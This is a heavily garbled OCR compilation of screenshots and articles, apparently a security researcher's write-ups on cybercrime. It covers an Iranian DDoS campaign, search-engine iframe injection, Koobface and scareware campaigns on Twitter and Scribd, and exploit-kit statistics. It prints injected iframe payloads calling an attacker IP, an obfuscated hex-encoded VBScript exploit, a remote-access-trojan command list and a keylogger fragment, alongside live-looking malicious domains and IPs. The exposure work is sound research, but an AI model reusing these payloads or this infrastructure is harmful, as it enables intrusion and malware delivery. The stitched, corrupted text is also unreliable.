- For Anonymous! vit 


Proxy IP//Host*: 
* Leave blank if not using a proxy server. 


URLs (new URL on each line) 


http://www leader .ir/mages/logo/87336 jpg 

http://www leader ir/media/album/medium/9626_247 jpg 
http://president ir/piri/media/mid/48007 jpg 
hitp://president ir/imagesAop_logo jpg 

http:///president .ir/piri/images/icons/G2_sendprvmsg.ait 
http://president ir/images,/sidebar_tiltle_center_rtl.gif 
http://president ir/piri/mediaAhumb/48003 jpg 
http://www Jinb ir/Images/4 jpg 

http://www Jinb ir/Images/1 jpg 
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Log 


Emor on URL #1 : Det gar inte att ansluta till fjarservem. 
Error on URL #5 : Det gar inte att ansluta till fjarservem. 
Emor on URL #2 : Det gar inte att ansluta till fjamservem. 
Eror on URL #0 : Det gar inte att ansluta till fjamservem. 


Det gar inte att ansluta till fjarserven 


if you click Raep after stopping your first raep and nothing's happening, then restart the program. 
Every URL gets executed on the webserver. Search commands are heavy on a database. 


The Conspiracy Theory and the Facts 

How is the Iranian government/regime responding to these attacks, is it striking back to the 
fullest extend speculated in a countless number of cyber warfare research papers? Moreover, 
can it actually attack the "adversaries" which in this case reside within the country’s own 
network? Can we easily compare this unpleasant situation from an information warfare 
perspective to the ongoing discussions whether or not the [4]Should the US Go Offensive In 
Cyberwarfare?, and "go offensive" against who at the first place? The hundreds of thousands 
of U.S based malware infected hosts operated by a foreign entity as the adversary [5]while 
using the targeted country’s infrastructure as a human shield? 
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G2) hte: (1127.0.0.1feeroyrame.pte? 


new _comp 
Bapate ncetonay Gory 
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Prices: MMN - 3, SSN - 3, DOB - 0.5, MDOB - 6 


News Log Out DL- 86, BR- 15, CR- 24 


| . 
| Balance: 0.00 points ( Refill balance ) 
| 


| Social Seourty Number 
Account AcTtIVartTa 
Your account is not yet activated. To begin using our service please add funds to your account in our Billing Section 
Minimum sum is 3 points (wmz) 
If you won't fund your account for the ferst trne within 24 hours it will be deleted 
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SPENCER-PRATT «IFRAME src=//89.149.243.201/t> pictures and videos ... 
SPENCER-PRATT pictures, videos, irmages and albums fromm Webshots. 

www. webshots. com/search?query=SPENCER-PRATT%20%3CIFRAME% 
20sre=/89.149.243.201A%3E - 38k - Cached - Similar pages 


SARA-EVANS-AND-JAY-BARKER <IFRAME src=/89.149.243.201/t> pictures ... 
SARA-EVANS-AND-JAY-BARKER pictures, videos, images and albums from VWebshots. 


www. webshots.com/search? query=SARA-EVANS-AND-JAY-BARKER%20 %3CIF RAME% 
20sre=/89.149.243.201 t%3E - 39k - Cached - Similar pages 


ATLASLOOT <IFRAME src=i/89.149.243.201/t> pictures and videos on... 
ATLASLOOT pictures, videos, images and albums from VWebshots. 
www.webshots.com/search?query=ATLASLOOT%20 %3CIFRAME% 

20sre=//89. 149.243, 201 t%3E - 38k - Cached - Similar pages 


CURSE-GAMING «IFRAME src=89.149.243.201/t> pictures and videos ... 
CURSE-GAMING pictures, videos, images and albums from VWYebshots. 

www. webshots. com/search? query=CURSE-GAMING %20%3CIF RAME% 
20sre=//89.149.243.201A4%3E - 38k - Cached - Similar pages 


WENDY-WILLIAMS <IFRAME src=//89.149.243.201/t> pictures and videos ... 
WENDY-WILLIAMS pictures, videos, images and albums from Webshots. 

www. webshots.com/search?query=VVEND Y-WILLIAMS%20 %3CIFRAME% 
20src=/89.149.243.201A%3E - 38k - Cached - Similar pages 


BILLY-JEAN-MICHAEL-JACKSON <IFRAME src=//89.149.243.201)t ... 
BILLY-JEAN-MICHAEL-JACKSON pictures, videos, images and albums from Webshots. 
www. webshots. com/search?query=BILLY-JEAN-MICHAEL-JACKSON%20 %3CIFRAME% 
20sre=89.149.243.201A%3E - 39k - Cached - Similar pages 


AUCTIONEER <IFRAME src=#89.149.243.201/t> pictures and videos on... 
AUCTIONEER pictures, videos, images and albums from Webshots. 

www. webshots. com/search?query=AUCTIONEER %20%3CIFRAME% 
20sre=//89.149.243.201 t%3E - 38k - Cached - Similar pages 


DEADLY-BOSS-MODS <IFRAME src=//89.149.243.201/t> pictures and ... 
DEADLY-BOSS-MODS pictures, videos, images and albums from Webshots. 

www. webshots. com/search?query=DEADLY-BOSS-MODS%20 %3CIFRAME% 
20src=H89.149.243.201A%3E - 38k - Cached - Similar pages 
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How the project was What operatons How the customer was How @ west supported What the customer 
documented instaied dDaed realy needed 


. How the Customer explained it 

. How the Project Leader understood it 

. How the Analyst designed it. 

. How the Programmer wrote it. 

. How the Business Consultant described it 
. How the project was documented 

. What operations installed 

. How the customer was billed. 


Oo ON DUM fF WN 


. How it was supported. 
. WHAT THE CUSTOMER NEEDED. 


ry 
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HITP/1.1 Server Too | ir“ cusver deorap 
Busy 


Server is too busy 


Bandwidth Limit 
Exceeded 


The coruer vt feremcranty rnalile th. terwee ¥ 
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¥< WindowSecurity.com sence 


© Artichs & Tutorals 
© msthors 

® Bogs 

® Unks 

© Message Goarcs 
© Newsletter Signup 
© ASS Few 

© Security Tests 

® Services 

© Sotware 


D Web Site Security 
Sponsored ty Acunetix 


© White Papers 


‘Scan for 0S5 vulnerabilities 
with Acunetis Feee edition 


Save up to 80% of storage space 


by archiving your email to SQL 


An aseessenen of seweral different recent apam 


carpaigns, demonuratng the key concerts ssammers Publishes Now 14, 2007 


US8, and providing Concine strategic advice on how to Updated Nov 14, 2007 
undermine their curser modet Secton Artkies Content Seourity 
(Email & FTP) ‘ 
Author: Dancho Danchey Meeting 
BB Priraatte vernon Ad Critical 
Adqust tot sia 9.) : Skill 
SPS es Saas os ok iY WS be 
aseee) i 


During 2007, spammers on a workdwide basis Genonstrated ther adaptability t the ongoing efforts anti-spam 
vendors pul erp ensuring the customers enjoy te benefits of having @ spen-bee infos What otrategees do 
spammers use in order to achieve this? What tactics do they use in order to obtain email addresses, verity their 
validity, ensure they reach fhe highes! number of receipts as poseble in the shortest time epan achievatie, while 
faking sure tir spam cameaipns cemeen virtually impo sede to shut down? 


in this article | arn going to assess several difiererst recent spam campaigns in onter t) Gemomstraie key concepts 
Spommers use, and provide concise strategic advice on how to undermine fret current model 


By the time | finesh writing the rst sertence of fis artes, hundreds of thousands spam emails would have 
successtully seached a great deal of mailboxes. Why is spam so successful at the bottom line? The truth is ~ tat it 
ien't, and most svterestingly ¢ doesn't even have to be successtul for the spammers to stop doing ff, as thet dint 
marketing tutiness model is brokers, it's just they're simply not interested im odiretting i! Mow is fis possible? 
Rather simple, while some ot the market participants are busy harvesting emaé addeesses to be sold later on, others 
are coming up with the efficent system used for spamming, where ther investment of sending several millions 
fmeneages will reach fhe beek-even point even ifonly several people actually purchane something 


Some of the most recent cases related to spam, greatly illustrate what gaening tactical wartare advantages truly 
means When enti spam vendors finally manage t detect image beeed epan, apeenmers simply atart Using PDF file 
e@tachmerns, and even more mnovat, MP3 pump and dump spam messages. According to a well known anti spar 
vendor, im October alone, approximately 15 milton MP2 audio tes were circulating across the globe What ts the 
Next logical tacte to be used by spammers? ifs video hosed spam where ther onty trade off might be actiewing 
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heed, 
ace GY again later 


Rete b Aayth tege | ISA net 


¥& WindowSecurity.con™ 


Windows Security Tool - Find Trustees with Admin Rights 
& SIDs with Rights - Free Eval! www VisuaiClick com 


@ Artois 5 Teorey 


OAsen Ad ecCOut Of wantous erie and dervetogmerts that 
© priners ema eced 4g 200), wd what we Re awn —-Pubshet Dec 12, 2007 
Lead tector) Dehwnd he huge percentage Mcresees MenenNg Updated Dec 12, 007 
Ce Lad ‘Sector: Artcins = Cortert Securty 
Mes: Bowes 
by 4 (eat arte) 
@ Newsete Sore Auman Carcho Oanchey ‘ 
BB Prvtatie Vernon b 
@RSS Fees Aden Fort sate += 
@ Secuty Tens Ratrg 54-1 Votes 
© tervcee warenasaencte «= 77 FO | Download 
snes eRe ce bade easses seeeecswens 
D etwewe SHARE THISARTICLE «© tccerwes Po Encryption 
Dine Ste Seourty Tool 
Sporeced by Arete Caring 2007 prethers Gemcnmthated tor yet arether Conmecutive yew Ihew per tEtence and Creativity on Tew wer to 
LOCaY CFOS 95 Mery DOOEE ORME O85 (ONES, FO) Lekewng Mey ae whe Mey pretend to be Wry Ga preiners 
@ Wete Popers CREF RCE CCOROMEET OT NORE Garin JOD, what Mectors COMP EA sed to Ihe COMME Sheen fered of tree E tees 
Or The DPESNEFS NO COMME UD WHT) © Take Omen rel howe Come Dest Genpte af he mae ewareress md HHO Ie Disk & File 
CrORIOR, poopie StH Fat victON to preEranD Scam? Tres article ment to Grovkie On Overview OF the hey tector s tet 
CONTEMEAT 1) he GOW are eroabon of presto Gang he yew Encryption Software 
for PC, Laptop, PDA 
7 The istest repert courtesy of the Art Preshing Group, provades some informative svarages regarding the time a and Mobile PC! 
printing ste remamre confine, a bey factor for the nuccess of the phishing campaign For nstance, August's APO 
| report states that that te sverage time oniine for site was 33 Gays, andthe longest time onine was 30 dey: As you 
can magne, he lege  pheshing campaign remains onine, the higher the probability that the recipert wil landon = 


= ‘ay responding phattung page, us get phesh-ed in between the Internet’: communty cofectve rteiigence on 
Seas te 58 weleeebites = Coordinating the tmety thutdown of newty appearing phesting domains, there are vendors aiready trying to 
(D Acenate Free en Commerciaitze the process of shulting down a phathing Campaign targeting her brand in partotr Such prortizaton 
may Pedeod be franciaby psttitatie in the wake of tome recerty reieated survey resuts stating that the beards 
cuntomers love trust it ery recesve a pheshing emai pretending to be tom the company, which is happereng to often 
Ghat f takes @ Drandiacking Index to beep tack of afl of thee actvites 
Seourty vendors, Pwd-garty reneerch groups, and Nhernet Communty prowects guch os Preattaré are rebcating an 


CRONOUS MOFORIE 1) The Neanber Of pfwErED comnts CHOU I) Ihe wkd, 05 wet os The urease Gorman renee 


o/ COrPen@Orting 1 Them Tres Moreete 6 MosRy Ge to he tatowing bey Comments Pa 1 Gecwne 1 Pes article namety. 
if D4 yOU SOT Oh INE he mrrebandty OF oreirIng page lemetates Tor every Meares and web Comparry Peat is Oot 
Oo ere to be (heared, Te CONACRIREON betrenen phenrers who enced at SOCMM ONgreernG WEN IpmMers wh ence 
Ah eneertng Vegmerten) emret to beter Vangel AR Tet COnURMLED 1) (RIS MetamOrDhOn TOR 8 baRy Marans 
Volacnebiliy enesaing SO FOP CRRTADON LO aN ETRCNNCY Centered process MCKAY rumercus Goman) Terms OCR CE whEN FeksITD 
fet 20day a de CODEN DAIORAINS Tangeting Gterent Orands COUretY OF he Rock Prem ht Several pears ago, he Concent of 
rb. (hesrerg tocar § there) grting some pthc aenbOn gion Tie Bick OF Oro weer Dealt 4 prctechon ApEn omcres  soLUTION CENTER) 
BARRE COMEON OPP) OR CTE OCICS AN Te CUTER terniabty OF Oroweter [rotechor hom presteg 
| READERS: CHOICE nm inaly Senenairies oe tpetoqedinn. statghes tesens, copacity nreaped totally puare dt Loam deel Cress Site 
how Os undermaing te trust MV E-commerce Lete Buttrate Tre protien and Now Cevotved, uy GHCUIIED FOR — S rigting and other 
Vetch te you preferred ty Mott MEO oyna attacks = ened 


‘Consctdation Spammers 
CO Untret Menttyoverd aoa 
C ata 1 yOu Pee ahont COMmORRRION, tart by tating FO) COMmERE AON he Org One Letrenen Epamers and Matware 
PATCHY Tet | BOC ET FO FEM OTC, Neammety ERMAN S Need Ihe Krai UChee 1) fOr Od ot Tee emats hom, 
© Cvitan weeduont Wee They BOGE TOM DOME MmETEN SOF Ut OF Gerard Preners ato Need Tete very Dame prerequstes t0 
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Warning, all 
application data will 
be lost! Message 
service and other 
services will be 
turned off. 
include third party 
applications 


Continue 
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BSS reel | £, Loading... 6 


0 4 
SoU OSU! U eS aie! CVE! ceed 9 ld SS > Cube JI aol S lw wr eli ag & FRA 
9S alg LS Ole lS esd] p> Gelw haw ean ° 


ars News Agency 
Pe . + 42 46.45 Pa 
f 
| 


Source of: http://www.farsnews.com/ - Mozilla Firefox 
Fie Edt Yew tielp 


<div class="lead">ae! goo gyV¥le pops pets 9 plLAs gledsls Gasid 5 pikd Zsld Gly gat A 
ityle="display: none:"> 


<iframe src="nttp://www.pagereboot.com/?urliehttp: //www.balatarin.com/érefresh=1"></iframe> 
<iframe sre="http://www.pagereboot.com/?url#http: //ghalamnews.com/érefresh=1"></iframe> 


></html> 
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US Aide JUS ae Opel WH Cutgiew & Ly se Ceciginw Wild, retld Sci! dog! 9 Gisuils Ulgld 


dpe Jie slc5d! GRE Slane! gly Gl gs gaan, 
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103.4> 92 Glg> SlASeliy pla O99d yw Dawei 


That’s a dilemma that Iran’s government is currently facing, but let’s connect the dots and 
prove that the [6]Fars News Agency which is pro-Ahmadinejad, and maintains ties to the 


[7]lranian judiciary, has in fact participated in this "cyber warfare attack with sticks and 
stones". 


The Fars News Agency has been under attack since the beginning of the campaign, ap- 
proximately 48 hours ago, prompting the site - just like many others - to switch to "lite" 
versions taking into consideration the ongoing attacks wasting the sites’ bandwidth. 
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News : 06.01.2008 Now we pay you 123 for 10000 unique visitors | It ts the 
Dest offer in all the world! and We have changed minimum payment to 7$ 


Partnership program for you... 
Everyone is wekome to jon the sbanners biz partnership program 

We pay for every unique views our Danner 

The starting price is 12% for 10000 unique views our banner 

We Court urique IP Every 24 Hours 

You only put the short one kine barmer code on your page(s) and stant to MAKE MONEY, 
10% Referral Earnings 

The payments are on request at everyday 

7$ payout merimum by E-gold ot PayPal. 


Frendly suppon semce 


Cheater wil be deleted without warning 


Everybody who works with us is satiefied 
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Merry Shristmas 


ry Cc) 


Sienphe browser statistics Main Statistks: Exploit statistics 
Browser Visits Exploited Percent Unigee Visits Exploited Percent Explot Exploited Percent 
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<Seript Language="UBScript"™> 

abe = 

" BO6F GH6E 662 06065 6672 6672 606F 6672 662 60672 6065 66730675 6060 0665 062 B606E 6665 0078 60740600 800A 60640869 
666) 662 66675 6672 B66C 862C 667 66661 66746668 B66) 866A 6075 667 2 BH6C 6630 6622 6668 66748607 4867 8663A B62F B62F 6 
677 6677 6677 O62E 6078 66766067 6661 BO6F 6668 6865 662E 8663 6B86E 662F 66606873 662F 8660 667460740673 662E 6665 66 
78 66065 6622 6660 666A 667 66661 667 46668 6630 6622 8643 663A BOSC BOSC 6673 6676 8668 6 B6F 6673 607 SO62E 6665 6078086 
5 8622 6600 068086073 6065 067 46602 66861 866 4066F 6630 6628 0064 6006F 66630675 6060 6665 BH6E 607 4062E 866360720665 
606106746065 6045 066C 0065 6060 0665 B06E 66740628 6022 BO6F 6662 606A 0065 806308740022 0629 0629 GH6D BG0A08636 
631 662 0063) 0622 6063 B66C 067 3 6069 66640037 6042 6044 6622 6060 660A 0063 6632 6630 0622 6639 6636 0643 0635 6635 06 
36 8620 0636 6635 6641 6633 6620 6631 6631 6622 O66) B66A 6063 6633 0630 6622 66440063 66020 6639 6638 6033 6041 6620663 
6663 66043 663 666346646 6622 6660 666A 6663 66346830 6622 6643 6632 8639 8845 6633 6636 6622 66D 866A 0661 6064 006F 
662E 6673 6065 66740641 6074606740672 68069 6662 6675 68740665 862 66622 6663 B66C 6861 6673 66730869 6864606022 06206 
62 06063 663 1 0626 6063 6632 0626 6063 6633 0626 6063 0634 B66) 6668 6643 0641 OB4F 6669 8630 6622 6040 0669 0063607206 
6F 0673 006F 6066 6674662E 6658 B64) BB4C 6048 065.4065 4605 60622 O66) 6068 06730065 607406260078 6060 B86C 8630606 
16064 606F 062E 0043 6672 0665 0061 007406065 BO4F 6062 00610065 6063 66740028 6043 6641 BO4F 6069 6620 062266226629 
666) 060A 6062 6631 0630 6622 6641 6622 6H6D 660A 666 2 6632 B63D 6622 6664 606F 6622 66D 666A 6662 0633 6630 662200646 
662 6622 B66) 866A 6862 6634063) 6622 B62E 8622 6860 660A 8062 6835 8630 8622 6873 66748622 BOG) 806A 8662 6636 6630 06 
2206726065 6622 8660 066A 6662 6637 6630 6622 606 1 8860 6622 BO6D 060A 6062 6038 8630 6662 6631 0626 6862 6032 0026006 
20633 6626 066260346626 0662 6635 6626 6662 6636 6626 60620637 6060 6600 0673 6065 6674062 06061 6663860306061 0664 
606F O62E 6063 60720665 6061 66740665 B06F 6662 06686065 6663 667 46028 6662 6638 6620 6622 66220629 6060 B60A00616 
631 6630 0622 0647 6622 BOBD 066A 6061 6632 6030 6022 6045 6622 BH6D G00A 006 1 6033 6630 6622 60546022 066) 006A 0078 08 
6D O66C BO2E BB4F 067 66065 BH6E 662 66061 6631 6626 666 1 6632 6626 666 1 6633 6620 6675 6672 666C 8620 663 BOO) B66A887 
86660 666C O62E 0653 6665 BOGE 806406080 666A 6061 6663 862E 80746079 867 66065 6630 6631 BH6D 686A 6061 6863 662E BO6F 
667 66665 666E 6660 6660 6661 6663 B62E 6077 667266696807 40665 662 66678 6660 8660 B62E 66726665 6673 607 BOG6F BO6ES 
6736065 6642 B66F 60646679 B66) 666A 666 1 8663 662E 6673 806 1 6876 0665 667 4O86F 6666 0069 BB6C 6065 662 60607 6606106 
740668 662C 6632 0660 006A 607 6 066 1607260206673 0068 6065 B66C BG6C 03D 606 1 066 4606F 662E 0663607266065 0661607 
40065 G66F 06626068 6065 6663667 46628 66220653 6068 6665 B66C GH6C B62E 0641 607 6067 BHH60 6069 6663 0606166740669 
6886F BOGE 6622 6620 6622 8622 6629 BUG) 866A 0661 0663 B62E 6063 8060 BO6F 6673 6065 BO8D 600A 66736068 6865 BO6C HH6C6 
62E 6653 6668 0665 6B6C B66C 062 8607 66661 8632 6632 8632 867 46868 8620 8622 6622 6620 8622 6622 6620 6622 OB6F 667 666 
65 B66E 6622 662C 663 66660 686A" 

cde = 

" BO6F GBE6E 062 66065 6672 067 2 GH6F 6672662 668726665 66730675 6060 6665 062 O606E 6665 0678 60740600 866A 6860 0631 
G03 0622 806F 6862 066A 0065 6863 067 48022 866) 860A 6860 6632 8630 6622 6063 B86C 0861 6073 86730069 6064002200606 
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59 
| Firefox 
i {= 
4 Mozilla 


Opera 8.54: 
Opera 9.00: 


WW 


Opera 9.01: 
Opera 9.02: 
Opera 9.10 


Opera 9.20: 


Seaey 


_ 
Ui 


Opera 9.21: 


i6 94.12 % 
2 66.67 % 
Opera 9.23: 12 70.59 % 
Opera 9.24: 14 12 85.71 % 
Opera 9.25: 35 29 82.86 % 


Opera 9.26: 80.95 % 
50: | 25 | o | 0% 
Opera9.51: | 32 | Oo | 0 % 
Opera9.52: | 46 | O | 0 % 
jOpera9.60: | 55 | 0 | 0% 
Opera 9.62: 0 0% 


4 Other | 4/0 


i 
| 


~ 
~ 


Opera 9.22: 


W 


[All Hits - 1552 ] [All toads- 385 ] 


Warning! C@Mac 


CCTV is Protecting 
this Building! 
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Command Listing 

‘Crd - Executes DOS Commands. Ex: /ernd dir C:\*-txt 
‘Time - Displays the Current System Date & Time 
éscreenshot - Takes Screenshot from Remote PC 
‘CloseCD - Closes the CD-ROM Drive Door 
/EjectCD - Ejects the CD-ROM Drive 
‘download - Downloads a specified file from Web 

Jord ver 


Microsoft Windows [Version 5.2.3790] 
(2) has signed back in. (2006/03/16 10:34 AM) 


femd dir D:Awindows\" bet 
: Volume in drive D is D 
Volume Serial Number is 1494-0440 


Directory of d:\windows 


02/02/2006 12:37 PM 52,576 ntbtlog. txt 
12/14/2005 05:03 AM 1,178 OEWABLog.txt 
12/14/2005 04:26 AM 660 428 setuplog.txt 
02/05/2006 05:42 PM O wplog.txt 

4 File(s) 714,182 bytes 

0 Dirfs) 8,140 832,768 bytes free 
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rh Analysis Reliable Flash Drive Virtual and Voice robots Legacy Flash 
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[ure Lees 
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ech l deostys 


(NewS NSDECRM CRM Webinar © carperetonctreerte ensyate 
Technology New! and Jobs » formation Techemtopy Mews + ZDNet Asi under FRAME neck ateck? 


ZDNet Asia under IFRAME hack attack? AO 
User Rating 0000010 


ro CCC C oon Be 


F Secure’s Secerity Response Team Manager, Wing Fei Chia, has posted an entry Moore fm 
at F.Secure’s beg claiming that Z0Net Asia has a prebter with thelr search 
engine and Cowld be seeding exers to sites laden with malware aed worse. 


Looks the Austraban technology news wedsde 
“Smarthiouse’ isnt the only website suferng a 
mystenous hack attack, athough une SmartHouse, no- 
‘one 15 accusing ZDNet Asia of alleged plagansm. 
However, the orly thing ZDNet Asia is being accused of is 
quesbonable securty 


Wing Fei Chia, security expert from F-Secure, has potted 


a biog entry titled "ZDNet Asia Compromised?” 
Chea explains that "ZDNet Asia is one of my bookmarked 
0-3.67TB online resource that | fequently vied. The ste is NOT 
- compromised per se, rather, thee ste's search engine 
IN NO TIME FLAT, was abused by an attacker with quenes of popular 
keywords” 
Related stories 
Continuing, Chia says that: “Leveraging on the fact that 
Googie’s CAPTCHA ~ Coat by spammers! the ste is, legitimate, and has high page ranks, the 
Googe hacked by a Dead Cow popular search engnes are returning seme of these 
Latest wabwrare Ireeats go loca sey MCAtee iFRAME-ed results in the first few pages cf the search 
Cxd you Change the Password? ftesults. And the objective? To get the unsuspicious user 


HEPA thers may help chderty ard trose with newt protiems — to clack on the fink” 
Mepert 400,000 untocked Phones Chine ~ at leact 
Ageia Prone t 1 4 frmeware to come Guring SOM laanch? Ad thes point on Chia’s blog posting shows @ screenshot 
Carger ts Mecrosett's raw Sadekict of a Google search cuthring aMected ZDNet Asia search 
The Gert gate of pen source Hacking My SCL resuts 
Pecghe cierned after Sit! had mare heart protien: 

Chia then said that: “The last time we checked, 20,600 
Cached pages loading the FRAME was found Upon chcking on the makcious brk, you get redirected to seme 
Russian Business Network's © and RBN is nctonously known for hosting net only maiware but also rouge 
antivirus and antispyware apphcations. Al the end of the redirects, the unsuspicious user might be a victien of 
Deb Trojan. We [F-Secure] detect ¢ a6 Trojan-Downloader W/G2/Deb HOG* 


Now Wing Fei Chia is no security slouch — he's been working in the IT Securty feld since 2003, according to 
hes midi 


He's currently the Securty Response Team Manager at the F-Secure Securty Labs, joined F-Secure in 2007 
and is a member of ISACA (information Systems Audt & Cortrol Association) and holds a CISSP (Certided 
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In a desperate attempt to influence the outcome of the DDoS attack, Fars News included 
iFrames pointing to opposition and anti-Ahmadinejad news sites (balatarin.com; ghalam- 
news.com and mirhussein.com) in order to redirect some of the attack traffic to them. The 
campaigners noticed the change, but upon confirming that the opposition’s web sites remain 
online even with the iFrames in place, decided to continue the attack. 
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The bottom line - when your very own infrastructure hates you, you become nothing else but 
an observer to the declining propaganda exposure projections that you’ve once set, failing to 
anticipate the fully realistic scenario when the adversary that you've been fortifying to protect 
from, or have build sophisticated offensive capabilities to deal with, is in fact residing within 
your own infrastructure. Attempting to attack him or shut him down will only multiply the 
effect of his original campaign. 


[8]The net is vast and infinite. 
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pushing Koobface variants beyond Facebook. 
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fl problem has been detected and windows has been shut down to 


prevent damage to your computer 


Initialization_failed C:\WINDOWS\syst Saneituchlent 


[f this is the first time you've see 


If this screen 


Detected security problems on your computer 
Spyware is software, which can gather 
information from user's computer throught 
Internet connection and send them to its 
creater. Gather information can be passwords, 
e-mail adresses and all that data, which is 
important for you 


information: 


OxO000006B (Oxc0000022, Ox00000002, Ox0 


WARNING! Your system is infected. It is necessary to improve PC security. 


Let’s summarize their activities during the past six days starting with the weekend’s campaign 
across Twitter. 


Upon clicking on the TinyURL, the user is redirected through their well known 66.199.229 
.253/etds (66.199.229 .253/etds/go.php?sid=41; 66.199.229 .253/etds/got.php?sid=41; 
66.199.229 .253/etds/go.php?sid=43; 66.199.229 .253/etds/got.php?sid=43) traffic manage- 
ment location, to end up at the scareware av4best .net (64.86.17.47) with a new template is 
served ([6]FakeAlert-EA). 


Parked on the same IP are also well Known scareware domains known from their previous 
Campaigns, namely fast-antivirus .com and viruscatcher .net. The scareware message used 
in the new template takes you back to the good old school MS-DOS days : 


"A problem has been detected and windows has been shut down to prevent damage to 
your computer. 
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Initialization _failed C:\WINDOWS\system32\himem.sys 


If this is the first time you’ve seen this Stop error screen, restart the computer. If this 
screen appears again, read information below: The reason why this might happen is the 
newest malicious software which blocks access to the system libraries. Check to make sure 
any new antivirus software is properly installed. We suggest you to download and install 
antivirus, new up-to-date software which specializes on detection and removal of malicious 
and suspicious software." 


The messaged used in the weekend’s Twitter campaign, as well as a graph on the peaks 


and downds for a particular keyword: 
13 «22:20 22:29 22:37 «2240 GREE) 220 23:92 23;21 


"Competitions video; What do you think about video; | know why Percent Of Accounts; 


Between food and gay; movie Trailler!; Sun eclipce free; Air France extreem; Tetris long and 
sweet; Take sex under control; alcohol long and sweet; Between food and SATs; What do you 
think about Autotune; Gotcha!, Palm Pre!; Goodnight high in the sky; What do you think about 
Hangover; Death of Autotune crack addict; Amazing. movie from MSFT; Amazing. Air France 
from MSFT; Sims 3, It’s Cool!; video, It’s Cool!; Manage Air France; Amazing. porn from MSFT; 
alcohol unbroken; Them girls Honduras; Between food and phish; Between food and Detroit; 
Tetris high in the sky; | know why iPhone; Futurama unbroken; Balls to the Woman Who Missed 
Air; alcohol high in the sky; follow the video" 


B® exhners 13: Unreal adult httptgirlstubes.cr/ 
A exhner4 13: Follow the adult httpuigirktubes crv 


Sample (now suspended) automatically registered accounts used in the weekend’s cam- 
paign: 

twitter .com/wenning351 

twitter .com/ula475 

twitter .com/escher338 
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twitter.com/reinhard192 
twitter .com/plath132 
twitter .com/bick497 
twitter .com/johannsen747 
twitter .com/tacke432 


Besides the TinyURL links used, they’ve also returned to temporarily using their original 
.uS domains such as twitter .8w8.us - 82.146.51.126 - Email: ambersurman@gmail.com; 5us 
us - 82.146.51.25 - Email: elchip0707@mail.ru, and girlstubes .cn 82.146.52.158 - Email: 
alexvasiliev1987@cocainmail.com with Alex Vasiliev’s emails first noticed in the [7]Diverse 
Portfolio of Fake Security Software - Part Nine and again in [8]Part Twenty. 


Hey there! ParisHiltonjpg1 is using Twitter. 


doing? Join today to start receiving ParisHiltonjpg1's 


% ‘ a 
: Name Parts Hilton jpg 
. . . ° Location Holywood 
ParisHiltonjpg1 Wb tp anowmes 
=, 2. 
Paris Hilton jpg HERE - CLICK ON Updates ‘ 
THE WEBSITE LINK BELOW F avons 
http://bit.ly/1a5ZsY a 
RMF” F 
BS 262 
Slas| Fo 


Vere Ad 


Now it’s time to assess their currently active campaigns across Twitter, LinkedIn and Scribd, 
and connect the dots in the face of the single URL acting as a counter across all the campaigns 
- counteringate .com (194.165.4.77) which has already been profiled in their [9]original 
massive blackhat SEO campaign, and still remains active. 
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ge of quick, frequert 5 to one simple Question Vhat ‘ 
joing? Join today to start receiving Britneywomani's fom your phone? Clic Bore 


' : ; 7 
Hey there! Britneywomani is using Twitter. 
Twitter is a free service that lets you keep in touch with people through 


Name Brtney Spears 
f = = Le<cation Hollywood 
Britneywomani Web hep stereos 
Blo Betney Spears womanzer 
mp3 


254 026 


folowing tofowers 
Britney Spears womanizer mp3 ‘tktas : 
HERE - CLICK ON THE WEBSITE aaa 
LINK BELOW http://bit.ly/1a5ZsY 
SIND 1s) Fi 
Bai ed =| 
avRena 


The automatically registered and currently active Twitter accounts participating in the cam- 
paign are as follows, it’s also worth pointing out that compared to their previous campaigns, 
in this way they’ve included relevant backgrounds and avatars to the Twitter accounts: 


twitter .com/AshleyTisdal1 
twitter .com/AnnaNicoleSmit 
twitter .com/ParisHiltonjpg1 
twitter .com/ParisHiltonmov1l 
twitter .com/ParisHiltonNake 
twitter .com/ParisHiltonSex1 
twitter .com/ParisHiltonNud2 
twitter .com/ParisSexTape2 
twitter .com/Britneynipslip1 
twitter .com/Britneywomani 
twitter .com/Britneystrip1 
twitter .com/BritneySex 
twitter .com/Britneycomix 
twitter .com/Britneywomaniz 
twitter .com/BritneyNaked2 
twitter .com/britneysextape 
twitter .com/BritneyxSpears1 
twitter .com/Britneydesnudal 
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™ Classes 

we Forms 

Aboutwb 

File Manager 
Floods.ve 

betro.vd 
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> 
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> frreMain.revources 
& HTTPFloodercs 
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& Program.cs 

<* ReqState.cs 
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< Resources.cs 
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{6] Extras 
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LimeLogger 


Program 


loggerPath = Application.StartupPath + @"\log.txt"; 


Main() 


_hookID = SetHook(_ proc); 
Application.Run(); 
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Runner Wordlists Configs HitsDB Tools Settings 
Progress: 


Test On Https 


Type Host Port Country Working Ping Chain 


x Delete All 


STATISTICS 
To 0 
Tested: 0 


Not Working: 0 

HTTP: O 

SOCKS: 

SOCKS4a: 

SOCK’ 

Chain: 0 
OPTIONS 


Only Untested 


Timeout (sec} 2 | 
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Load Combo Listview Text 


Password 
Load Proxy 


Proxy Type HTTP/HTTPS 
Threads : 50 


START/STOP 


START 


Statistics 
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Bad - 

Errors 
Retry) NoGame0O 2FA 0 | 
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&* RoyRenamer 
Susing Systes; 
ing Systee.Collections.Generi 
using System. Diagnostics; 
using Systes, Orawing; 
ng Systea.tiag 


using System. Rustine. InteropServices; 


ystems, Text; 


using Systee. Threading; 
using Console « Colorful.console; 


fhemespace RryResseer 
{ 
class Pr 


{ 
{Ol kimport(“wser32,d)1°)) 
static extern int SethtindowText(Intet 


ogres 


Baind, string mewtitle); 
public static void BackMens() 


le. Title « 

sole.Clear(); 
225; 
255; 
2; 


itils,.RandosString(); 


sole. Meitetine(@* 
et «= 28; 
b -= 193 
Console.Meitevine(@* 
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| Dyreténo stual 7 
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scribd .com/PamelaAnderson %20nude 
scribd .com/Anna %20Nicole %20Smithnude 
scribd .com/Meg %20Ryan %20nude 

scribd .com/Kate %20Hudsonnude 


Now that all the campaigns are exposed in the naked fashion of their themes, it’s worth 
emphasizing on the live exploits serving Koobface samples based on a bit.ly referrer - in this 
case the process takes place through myhealtharea .cn/in.cgi?13, which instead of redirecting 
to scareware domain as analyzed above, is redirecting to fast-fluxed set of IPs serving identical 
[13]Koobface binary - myhealtharea .cn/in.cgi?13 loads r-cg100609 .com/go/?pid=30455 


&type=videxp (92.38.0.69) which redirectss to the live exploits/Koobface. 


Parked on 92.38.0.69 are also the following domains: 
er20090515 .com 

upr0306 .com 

cgpay0406 .com 

r-cgpay-15062009 .com 

r-cg100609 .com 

trisem .com 

uprtrishest .com 

upril5may .com 

rd040609-cgpay .net 


